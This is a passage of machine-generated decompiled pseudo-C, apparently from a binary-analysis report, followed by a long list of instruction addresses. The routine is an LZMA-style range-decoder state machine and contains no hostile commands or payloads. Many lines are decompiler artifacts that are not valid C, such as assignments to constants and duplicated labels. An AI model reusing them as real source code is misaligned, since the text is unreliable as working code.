												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                0x00000000
                0x00406473
                0x00406473
                0x00406477
                0x00406498
                0x0040649f
                0x004064a5
                0x004064ab
                0x004064bd
                0x004064c3
                0x004064c8
                0x00000000
                0x00406479
                0x0040647f
                0x00406840
                0x00406840
                0x00406840
                0x00406843
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00406891
                0x00406895
                0x00406a44
                0x00406a5a
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00406a72
                0x00406a76
                0x00406a76
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x004068b6
                0x004068b6
                0x004068bc
                0x004068bc
                0x00406058
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
